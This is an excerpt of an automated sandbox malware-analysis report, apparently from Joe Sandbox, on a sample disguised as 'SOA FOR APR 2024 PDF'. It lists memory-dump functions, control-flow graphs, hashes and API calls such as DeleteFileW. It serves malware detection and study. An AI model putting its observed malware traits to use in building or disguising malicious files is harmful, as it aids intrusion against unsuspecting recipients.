66b57ae-66b57b1 2377->2385 2382 66b5866-66b58a4 2378->2382 2383 66b5784-66b578c 2378->2383 2379->2374 2387 66b5671-66b5674 2380->2387 2388 66b5664-66b566a 2380->2388 2381->2380 2404 66b58a6-66b58a9 2382->2404 2383->2382 2389 66b5792-66b5795 2383->2389 2384->2385 2390 66b57d3-66b57d6 2385->2390 2391 66b57b3-66b57b7 2385->2391 2395 66b5691-66b5694 2387->2395 2396 66b5676-66b568c 2387->2396 2388->2381 2394 66b566c 2388->2394 2389->2377 2392 66b57d8-66b57dc 2390->2392 2393 66b57f4-66b57f7 2390->2393 2391->2382 2399 66b57bd-66b57c5 2391->2399 2392->2382 2401 66b57e2-66b57ea 2392->2401 2402 66b57f9-66b5800 2393->2402 2403 66b5807-66b580a 2393->2403 2394->2387 2405 66b56a0-66b56a3 2395->2405 2406 66b5696-66b569f 2395->2406 2396->2395 2399->2382 2400 66b57cb-66b57ce 2399->2400 2400->2390 2401->2382 2407 66b57ec-66b57ef 2401->2407 2408 66b585e-66b5865 2402->2408 2409 66b5802 2402->2409 2411 66b580c-66b5813 2403->2411 2412 66b5814-66b5817 2403->2412 2413 66b58ab-66b58bc 2404->2413 2414 66b58c7-66b58ca 2404->2414 2415 66b56bf-66b56c2 2405->2415 2416 66b56a5-66b56ba 2405->2416 2407->2393 2409->2403 2417 66b5819-66b582a 2412->2417 2418 66b582f-66b5832 2412->2418 2432 66b58c2 2413->2432 2433 66b5bc5-66b5bcc 2413->2433 2419 66b5bb3-66b5bb6 2414->2419 2420 66b58d0-66b5a64 2414->2420 2415->2341 2415->2353 2416->2415 2417->2418 2425 66b584c-66b584e 2418->2425 2426 66b5834-66b5838 2418->2426 2422 66b5bb8-66b5bbd 2419->2422 2423 66b5bc0-66b5bc3 2419->2423 2483 66b5a6a-66b5a71 2420->2483 2484 66b5b9d-66b5bb0 2420->2484 2422->2423 2423->2433 2434 66b5bd1-66b5bd4 2423->2434 2429 66b5850 2425->2429 2430 66b5855-66b5858 2425->2430 2426->2382 2427 66b583a-66b5842 2426->2427 2427->2382 2437 66b5844-66b5847 2427->2437 2429->2430 2430->2371 2430->2408 2432->2414 2433->2434 2435 66b5bec-66b5bef 2434->2435 2436 66b5bd6-66b5be9 2434->2436 2439 66b5c09-66b5c0c 2435->2439 2440 66b5bf1-66b5c02 2435->2440 2437->2425 2439->2420 2442 66b5c12-66b5c15 2439->2442 2446 66b5c3d-66b5c4e 2440->2446 2447 66b5c04 2440->2447 2442->2420 2445 66b5c1b-66b5c1e 2442->2445 2448 66b5c38-66b5c3b 2445->2448 2449 66b5c20-66b5c31 2445->2449 2446->2433 2456 66b5c54 2446->2456 2447->2439 2448->2446 2450 66b5c59-66b5c5c 2448->2450 2449->2436 2460 66b5c33 2449->2460 2453 66b5c6a-66b5c6d 2450->2453 2454 66b5c5e-66b5c65 2450->2454 2457 66b5c8b-66b5c8d 2453->2457 2458 66b5c6f-66b5c80 2453->2458 2454->2453 2456->2450 2461 66b5c8f 2457->2461 2462 66b5c94-66b5c97 2457->2462 2458->2433 2466 66b5c86 2458->2466 2460->2448 2461->2462 2462->2404 2465 66b5c9d-66b5ca6 2462->2465 2466->2457 2485 66b5a77-66b5aaa 2483->2485 2486 66b5b25-66b5b2c 2483->2486 2496 66b5aaf-66b5af0 2485->2496 2497 66b5aac 2485->2497 2486->2484 2487 66b5b2e-66b5b61 2486->2487 2499 66b5b63 2487->2499 2500 66b5b66-66b5b93 2487->2500 2508 66b5b08-66b5b0f 2496->2508 2509 66b5af2-66b5b03 2496->2509 2497->2496 2499->2500 2500->2465 2511 66b5b17-66b5b19 2508->2511 2509->2465 2511->2465
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-3993045852
                                  • Opcode ID: 4ee7be09fb4d6cc3fc8f342dba94fd37b25e24bef54919118e5813d7be408aed
                                  • Instruction ID: cca0bd14f6c3f7bf158506ec6b78355654be28845487432a623271cc67e94a98
                                  • Opcode Fuzzy Hash: 4ee7be09fb4d6cc3fc8f342dba94fd37b25e24bef54919118e5813d7be408aed
                                  • Instruction Fuzzy Hash: 5422BE71E10219DFDF60DFA4C5906EEBBB2EF84320F24846AD416AB395DA35DD81CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B65C8 Relevance: .8, Instructions: 814COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: daf2cc2491de101a5f5d7073188d119a312f0301f95d320adb9a1d28e14af466
                                  • Instruction ID: 42f924a6f7421b0fd8c6c546679b348e77310eb02530a5e8b0b469f894954b5c
                                  • Opcode Fuzzy Hash: daf2cc2491de101a5f5d7073188d119a312f0301f95d320adb9a1d28e14af466
                                  • Instruction Fuzzy Hash: 3C629D34B00205CFDB54EB68D584AADBBF6EF84314F249469E406EB395DB35ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BC138 Relevance: .6, Instructions: 636COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81e976e9d80037b3697ed79d6c55a8e2caf9370cec62dcd9b948d74669bb6b6b
                                  • Instruction ID: 56061034dd4f0e7627ca5c1b4e60fd11952240472531028e00b31b377383e200
                                  • Opcode Fuzzy Hash: 81e976e9d80037b3697ed79d6c55a8e2caf9370cec62dcd9b948d74669bb6b6b
                                  • Instruction Fuzzy Hash: 3A32AF34B00205CFDB54EB68D994AEDBBB6FB88310F109569E409E7359DB34ED85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BAC90 Relevance: 10.4, Strings: 8, Instructions: 390COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 66bac90-66bacae 1 66bacb0-66bacb3 0->1 2 66bacd6-66bacd9 1->2 3 66bacb5-66bacd1 1->3 4 66bacdb-66bace0 2->4 5 66bace3-66bace6 2->5 3->2 4->5 8 66bace8-66bacec 5->8 9 66bacf7-66bacfa 5->9 11 66bacee-66bacf2 8->11 12 66baebc-66baec6 8->12 13 66bad0a-66bad0d 9->13 14 66bacfc-66bad05 9->14 11->9 16 66bad0f-66bad1c 13->16 17 66bad21-66bad24 13->17 14->13 16->17 18 66bad3e-66bad41 17->18 19 66bad26-66bad2f 17->19 22 66baead-66baeb6 18->22 23 66bad47-66bad4a 18->23 20 66baec7-66baefe 19->20 21 66bad35-66bad39 19->21 32 66baf00-66baf03 20->32 21->18 22->12 22->19 25 66bad4c-66bad5f 23->25 26 66bad64-66bad66 23->26 25->26 27 66bad68 26->27 28 66bad6d-66bad70 26->28 27->28 28->1 31 66bad76-66bad9a 28->31 47 66baeaa 31->47 48 66bada0-66badaf 31->48 33 66baf10-66baf13 32->33 34 66baf05-66baf09 32->34 35 66baf36-66baf39 33->35 36 66baf15-66baf31 33->36 38 66baf0b 34->38 39 66baf61-66baf9c 34->39 40 66baf3b-66baf45 35->40 41 66baf46-66baf49 35->41 36->35 38->33 49 66bb18f-66bb1a2 39->49 50 66bafa2-66bafae 39->50 44 66baf4b 41->44 45 66baf58-66baf5b 41->45 125 66baf4b call 66bb1e8 44->125 126 66baf4b call 66bb1f8 44->126 45->39 51 66bb1c4-66bb1c6 45->51 47->22 60 66badb1-66badb7 48->60 61 66badc7-66bae02 call 66b6578 48->61 52 66bb1a4 49->52 62 66bafce-66bb012 50->62 63 66bafb0-66bafc9 50->63 54 66bb1c8 51->54 55 66bb1cd-66bb1d0 51->55 52->51 54->55 55->32 59 66bb1d6-66bb1e0 55->59 56 66baf51-66baf53 56->45 64 66badbb-66badbd 60->64 65 66badb9 60->65 77 66bae1a-66bae31 61->77 78 66bae04-66bae0a 61->78 79 66bb02e-66bb06d 62->79 80 66bb014-66bb026 62->80 63->52 64->61 65->61 91 66bae49-66bae5a 77->91 92 66bae33-66bae39 77->92 81 66bae0e-66bae10 78->81 82 66bae0c 78->82 86 66bb073-66bb14e call 66b6578 79->86 87 66bb154-66bb169 79->87 80->79 81->77 82->77 86->87 87->49 99 66bae5c-66bae62 91->99 100 66bae72-66baea3 91->100 94 66bae3b 92->94 95 66bae3d-66bae3f 92->95 94->91 95->91 101 66bae66-66bae68 99->101 102 66bae64 99->102 100->47 101->100 102->100 125->56 126->56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: d22a90a8b10fc003625166f6b5cb21e567c91b9b876b9301f31f90b29372bb1a
                                  • Instruction ID: 2f52b6790a40c74a719871c79c99e603e03a1f3fd9edf36522d1ad48b232fdc4
                                  • Opcode Fuzzy Hash: d22a90a8b10fc003625166f6b5cb21e567c91b9b876b9301f31f90b29372bb1a
                                  • Instruction Fuzzy Hash: 08E16C30E10209CFDB69EFA5D9946EEB7B6EF85300F109529E415AB359DB34DC86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B9118 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 862 66b9118-66b913d 863 66b913f-66b9142 862->863 864 66b9168-66b916b 863->864 865 66b9144-66b9163 863->865 866 66b9a2b-66b9a2d 864->866 867 66b9171-66b9186 864->867 865->864 868 66b9a2f 866->868 869 66b9a34-66b9a37 866->869 874 66b9188-66b918e 867->874 875 66b919e-66b91b4 867->875 868->869 869->863 872 66b9a3d-66b9a47 869->872 876 66b9192-66b9194 874->876 877 66b9190 874->877 879 66b91bf-66b91c1 875->879 876->875 877->875 880 66b91d9-66b924a 879->880 881 66b91c3-66b91c9 879->881 892 66b924c-66b926f 880->892 893 66b9276-66b9292 880->893 882 66b91cb 881->882 883 66b91cd-66b91cf 881->883 882->880 883->880 892->893 898 66b92be-66b92d9 893->898 899 66b9294-66b92b7 893->899 904 66b92db-66b92fd 898->904 905 66b9304-66b931f 898->905 899->898 904->905 910 66b934a-66b9354 905->910 911 66b9321-66b9343 905->911 912 66b9356-66b935f 910->912 913 66b9364-66b93de 910->913 911->910 912->872 919 66b942b-66b9440 913->919 920 66b93e0-66b93fe 913->920 919->866 924 66b941a-66b9429 920->924 925 66b9400-66b940f 920->925 924->919 924->920 925->924
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 8eea426b01a2b6c0e0ffd8048664bef23af633ab565cfc01b091b1a9e6efa228
                                  • Instruction ID: c54e61f811abf1994f9deb47d61d690bbeed75f9c8ff0b987a9b8870c5a85edc
                                  • Opcode Fuzzy Hash: 8eea426b01a2b6c0e0ffd8048664bef23af633ab565cfc01b091b1a9e6efa228
                                  • Instruction Fuzzy Hash: 45916030F0060A8FDB94DF65D9547AE77B6AF85340F108569D909EB398EB30ED868B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BCF00 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 928 66bcf00-66bcf1b 929 66bcf1d-66bcf20 928->929 930 66bcf69-66bcf6c 929->930 931 66bcf22-66bcf64 929->931 932 66bcf6e-66bcf73 930->932 933 66bcf76-66bcf79 930->933 931->930 932->933 934 66bcf7b-66bcf97 933->934 935 66bcf9c-66bcf9f 933->935 934->935 937 66bcfae-66bcfb1 935->937 938 66bcfa1-66bcfa3 935->938 943 66bcffa-66bcffd 937->943 944 66bcfb3-66bcff5 937->944 941 66bcfa9 938->941 942 66bd2a7-66bd2b0 938->942 941->937 947 66bd2bf-66bd2cb 942->947 948 66bd2b2-66bd2b7 942->948 945 66bcfff-66bd001 943->945 946 66bd00c-66bd00f 943->946 944->943 952 66bd3e9 945->952 953 66bd007 945->953 954 66bd058-66bd05b 946->954 955 66bd011-66bd053 946->955 949 66bd3dc-66bd3e1 947->949 950 66bd2d1-66bd2e5 947->950 948->947 949->952 950->952 972 66bd2eb-66bd2fd 950->972 958 66bd3ec-66bd3f8 952->958 953->946 959 66bd05d-66bd09f 954->959 960 66bd0a4-66bd0a7 954->960 955->954 966 66bd3fe-66bd6eb 958->966 967 66bd1e2-66bd1f1 958->967 959->960 963 66bd0a9-66bd0b8 960->963 964 66bd0f0-66bd0f3 960->964 973 66bd0ba-66bd0bf 963->973 974 66bd0c7-66bd0d3 963->974 964->958 976 66bd0f9-66bd0fc 964->976 1141 66bd912-66bd91c 966->1141 1142 66bd6f1-66bd6f7 966->1142 970 66bd1f3-66bd1f8 967->970 971 66bd200-66bd20c 967->971 970->971 978 66bd91d-66bd956 971->978 979 66bd212-66bd224 971->979 996 66bd2ff-66bd305 972->996 997 66bd321-66bd323 972->997 973->974 974->978 980 66bd0d9-66bd0eb 974->980 982 66bd0fe-66bd140 976->982 983 66bd145-66bd148 976->983 1006 66bd958-66bd95b 978->1006 1001 66bd229-66bd22c 979->1001 980->964 982->983 987 66bd14a-66bd18c 983->987 988 66bd191-66bd194 983->988 987->988 992 66bd1dd-66bd1e0 988->992 993 66bd196-66bd1d8 988->993 992->967 992->1001 993->992 1002 66bd309-66bd315 996->1002 1003 66bd307 996->1003 1007 66bd32d-66bd339 997->1007 1010 66bd22e-66bd270 1001->1010 1011 66bd275-66bd278 1001->1011 1012 66bd317-66bd31f 1002->1012 1003->1012 1014 66bd97e-66bd981 1006->1014 1015 66bd95d-66bd979 1006->1015 1030 66bd33b-66bd345 1007->1030 1031 66bd347 1007->1031 1010->1011 1022 66bd27a-66bd290 1011->1022 1023 66bd295-66bd297 1011->1023 1012->1007 1024 66bd983-66bd9af 1014->1024 1025 66bd9b4-66bd9b7 1014->1025 1015->1014 1022->1023 1035 66bd299 1023->1035 1036 66bd29e-66bd2a1 1023->1036 1024->1025 1037 66bd9b9 1025->1037 1038 66bd9c6-66bd9c8 1025->1038 1042 66bd34c-66bd34e 1030->1042 1031->1042 1035->1036 1036->929 1036->942 1188 66bd9b9 call 66bda88 1037->1188 1189 66bd9b9 call 66bda75 1037->1189 1039 66bd9ca 1038->1039 1040 66bd9cf-66bd9d2 1038->1040 1039->1040 1040->1006 1045 66bd9d4-66bd9e3 1040->1045 1042->952 1048 66bd354-66bd370 call 66b6578 1042->1048 1061 66bda4a-66bda5f 1045->1061 1062 66bd9e5-66bda48 call 66b6578 1045->1062 1071 66bd37f-66bd38b 1048->1071 1072 66bd372-66bd377 1048->1072 1052 66bd9bf-66bd9c1 1052->1038 1077 66bda60 1061->1077 1062->1061 1071->949 1076 66bd38d-66bd3da 1071->1076 1072->1071 1076->952 1077->1077 1143 66bd6f9-66bd6fe 1142->1143 1144 66bd706-66bd70f 1142->1144 1143->1144 1144->978 1145 66bd715-66bd728 1144->1145 1147 66bd72e-66bd734 1145->1147 1148 66bd902-66bd90c 1145->1148 1149 66bd743-66bd74c 1147->1149 1150 66bd736-66bd73b 1147->1150 1148->1141 1148->1142 1149->978 1151 66bd752-66bd773 1149->1151 1150->1149 1154 66bd782-66bd78b 1151->1154 1155 66bd775-66bd77a 1151->1155 1154->978 1156 66bd791-66bd7ae 1154->1156 1155->1154 1156->1148 1159 66bd7b4-66bd7ba 1156->1159 1159->978 1160 66bd7c0-66bd7d9 1159->1160 1162 66bd7df-66bd806 1160->1162 1163 66bd8f5-66bd8fc 1160->1163 1162->978 1166 66bd80c-66bd816 1162->1166 1163->1148 1163->1159 1166->978 1167 66bd81c-66bd833 1166->1167 1169 66bd842-66bd85d 1167->1169 1170 66bd835-66bd840 1167->1170 1169->1163 1175 66bd863-66bd87c call 66b6578 1169->1175 1170->1169 1179 66bd88b-66bd894 1175->1179 1180 66bd87e-66bd883 1175->1180 1179->978 1181 66bd89a-66bd8ee 1179->1181 1180->1179 1181->1163 1188->1052 1189->1052
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq
                                  • API String ID: 0-3696375380
                                  • Opcode ID: 51df000b1a2ef0991d44d992336fd2aedcd227ce5147859a2d7cf01800387303
                                  • Instruction ID: 427d04f44dfbfd64941ffc9028f97357087b146b3991486602afb56dcc3740be
                                  • Opcode Fuzzy Hash: 51df000b1a2ef0991d44d992336fd2aedcd227ce5147859a2d7cf01800387303
                                  • Instruction Fuzzy Hash: 86623030A00605CFCB55EF68E590A9EB7BAFF84314F209669D0059F369DB75ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E907A8 Relevance: 4.1, Strings: 3, Instructions: 347COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1190 e907a8-e907cd 1191 e907d3-e907d5 1190->1191 1192 e90922-e90946 1190->1192 1193 e907db-e907e4 1191->1193 1194 e9094d-e90971 1191->1194 1192->1194 1196 e907f7-e9081e 1193->1196 1197 e907e6-e907f4 1193->1197 1216 e90973-e9099c 1194->1216 1199 e908a8-e908ac 1196->1199 1200 e90824-e90837 call e904a4 1196->1200 1197->1196 1201 e908ae-e908db call e904b4 1199->1201 1202 e908e3-e908fc 1199->1202 1200->1199 1215 e90839-e9088c 1200->1215 1219 e908e0 1201->1219 1209 e908fe 1202->1209 1210 e90906 1202->1210 1209->1210 1210->1192 1215->1199 1222 e9088e-e908a1 1215->1222 1226 e9099e-e909d2 1216->1226 1219->1202 1222->1199 1229 e909d8-e909eb 1226->1229 1230 e90a93 1226->1230 1229->1230 1235 e909f1-e909fd 1229->1235 1232 e90a98-e90aa3 1230->1232 1236 e90aaa-e90ad3 1232->1236 1235->1232 1239 e90a03-e90a2e 1235->1239 1240 e90adf-e90bb4 1236->1240 1241 e90ad5-e90ade 1236->1241 1239->1230 1248 e90a30-e90a3c 1239->1248 1261 e90bba-e90bc8 1240->1261 1250 e90a88-e90a92 1248->1250 1251 e90a3e-e90a41 1248->1251 1253 e90a44-e90a4d 1251->1253 1253->1236 1255 e90a4f-e90a6a 1253->1255 1256 e90a6c-e90a6e 1255->1256 1257 e90a72-e90a75 1255->1257 1256->1230 1259 e90a70 1256->1259 1257->1230 1260 e90a77-e90a86 1257->1260 1259->1260 1260->1250 1260->1253 1263 e90bca-e90bd0 1261->1263 1264 e90bd1-e90c09 1261->1264 1263->1264 1268 e90c19 1264->1268 1269 e90c0b-e90c0f 1264->1269 1271 e90c1a 1268->1271 1269->1268 1270 e90c11 1269->1270 1270->1268 1271->1271
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280595142.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_e90000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nq$(nq$(nq
                                  • API String ID: 0-1280547490
                                  • Opcode ID: ef37089162d5336d0a1bebabeba99672cff8b3b4caf2d365dc695edf416ddf52
                                  • Instruction ID: 915f6c2e07fcc394a250b97d97428f1c3cda37d54879e6e2cdd429cf09fbc939
                                  • Opcode Fuzzy Hash: ef37089162d5336d0a1bebabeba99672cff8b3b4caf2d365dc695edf416ddf52
                                  • Instruction Fuzzy Hash: C5D19A71E003098FCB15DFA9C8546AEBBF2EF88310F148569E409BB291DB74AD81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B4B38 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1272 66b4b38-66b4b5c 1273 66b4b5e-66b4b61 1272->1273 1274 66b5240-66b5243 1273->1274 1275 66b4b67-66b4c5f 1273->1275 1276 66b5245-66b525f 1274->1276 1277 66b5264-66b5266 1274->1277 1295 66b4ce2-66b4ce9 1275->1295 1296 66b4c65-66b4cad 1275->1296 1276->1277 1279 66b5268 1277->1279 1280 66b526d-66b5270 1277->1280 1279->1280 1280->1273 1281 66b5276-66b5283 1280->1281 1297 66b4cef-66b4d5f 1295->1297 1298 66b4d6d-66b4d76 1295->1298 1318 66b4cb2 call 66b53e0 1296->1318 1319 66b4cb2 call 66b53f0 1296->1319 1315 66b4d6a 1297->1315 1316 66b4d61 1297->1316 1298->1281 1309 66b4cb8-66b4cd4 1313 66b4cdf-66b4ce0 1309->1313 1314 66b4cd6 1309->1314 1313->1295 1314->1313 1315->1298 1316->1315 1318->1309 1319->1309
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: foq$XPoq$\Ooq
                                  • API String ID: 0-3137531485
                                  • Opcode ID: d9ba88a302921cf9e1004cb1103192ec25c76b297cff7d8d45830a805870108f
                                  • Instruction ID: 96082a2c192b8143135ada87c9d5809e39f7db2d46f6c3a48c67007a077c23b2
                                  • Opcode Fuzzy Hash: d9ba88a302921cf9e1004cb1103192ec25c76b297cff7d8d45830a805870108f
                                  • Instruction Fuzzy Hash: B9617230E002089FEF549FA4C8557AEBAF6FF88700F208129E106AB395DF758D459B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B9108 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2217 66b9108-66b913d 2218 66b913f-66b9142 2217->2218 2219 66b9168-66b916b 2218->2219 2220 66b9144-66b9163 2218->2220 2221 66b9a2b-66b9a2d 2219->2221 2222 66b9171-66b9186 2219->2222 2220->2219 2223 66b9a2f 2221->2223 2224 66b9a34-66b9a37 2221->2224 2229 66b9188-66b918e 2222->2229 2230 66b919e-66b91b4 2222->2230 2223->2224 2224->2218 2227 66b9a3d-66b9a47 2224->2227 2231 66b9192-66b9194 2229->2231 2232 66b9190 2229->2232 2234 66b91bf-66b91c1 2230->2234 2231->2230 2232->2230 2235 66b91d9-66b924a 2234->2235 2236 66b91c3-66b91c9 2234->2236 2247 66b924c-66b926f 2235->2247 2248 66b9276-66b9292 2235->2248 2237 66b91cb 2236->2237 2238 66b91cd-66b91cf 2236->2238 2237->2235 2238->2235 2247->2248 2253 66b92be-66b92d9 2248->2253 2254 66b9294-66b92b7 2248->2254 2259 66b92db-66b92fd 2253->2259 2260 66b9304-66b931f 2253->2260 2254->2253 2259->2260 2265 66b934a-66b9354 2260->2265 2266 66b9321-66b9343 2260->2266 2267 66b9356-66b935f 2265->2267 2268 66b9364-66b93de 2265->2268 2266->2265 2267->2227 2274 66b942b-66b9440 2268->2274 2275 66b93e0-66b93fe 2268->2275 2274->2221 2279 66b941a-66b9429 2275->2279 2280 66b9400-66b940f 2275->2280 2279->2274 2279->2275 2280->2279
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 33036b38116735be119f343afc089049020c6e1e3d92d3cdbcc3854a1c27946d
                                  • Instruction ID: 09ed62043918f6342ca5cfed6c72eda1d88cac5d9bac862cd7c90d4da908d47e
                                  • Opcode Fuzzy Hash: 33036b38116735be119f343afc089049020c6e1e3d92d3cdbcc3854a1c27946d
                                  • Instruction Fuzzy Hash: B8517130B005068FDB94EF78D954BAE77F6EF85340F108569D909EB398EA34DC468B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00F08168 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2512 f08168-f081ba 2515 f081c2-f081ed DeleteFileW 2512->2515 2516 f081bc-f081bf 2512->2516 2517 f081f6-f0821e 2515->2517 2518 f081ef-f081f5 2515->2518 2516->2515 2518->2517
                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 00F081E0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280923727.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_f00000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 77ce84a499247179530fb40158dbb7ffc3e5795d83b31b925dc2e6fb01624124
                                  • Instruction ID: db2b73d9247139bf8256d0938fbe86ab6843a1aaa6a95892f0dd641ac5a051c5
                                  • Opcode Fuzzy Hash: 77ce84a499247179530fb40158dbb7ffc3e5795d83b31b925dc2e6fb01624124
                                  • Instruction Fuzzy Hash: 7C2115B1C0061A9FCB14CF9AC445BAEFBB5FF48320F158129D958A7241D738A941CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00F07800 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2521 f07800-f081ba 2524 f081c2-f081ed DeleteFileW 2521->2524 2525 f081bc-f081bf 2521->2525 2526 f081f6-f0821e 2524->2526 2527 f081ef-f081f5 2524->2527 2525->2524 2527->2526
                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 00F081E0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280923727.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_f00000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 85a8543aefa2c80b328f6c91aa5b1f18c28ac9ff48bfdd0fc27610391c01bf4a
                                  • Instruction ID: b378dd30d0d40265604eec47844ba88da1bf922893fbc8d69a1000340a74b6dc
                                  • Opcode Fuzzy Hash: 85a8543aefa2c80b328f6c91aa5b1f18c28ac9ff48bfdd0fc27610391c01bf4a
                                  • Instruction Fuzzy Hash: 862144B1C0061A9BCB10DF9AC4447AEFBB5FF08320F10812AE858B7240D738A941CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00F0F088 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2530 f0f088-f0f0fc GlobalMemoryStatusEx 2532 f0f105-f0f12d 2530->2532 2533 f0f0fe-f0f104 2530->2533 2533->2532
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00F0F0EF
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280923727.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_f00000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: c86a9e5a798ab91ec483e2263027b43374b86314a78807d7fdc5a1b7e086a0d7
                                  • Instruction ID: 328170cb035968205d7854baf97ff617c372e4adffe9f7d31fa8a9be29fab7b3
                                  • Opcode Fuzzy Hash: c86a9e5a798ab91ec483e2263027b43374b86314a78807d7fdc5a1b7e086a0d7
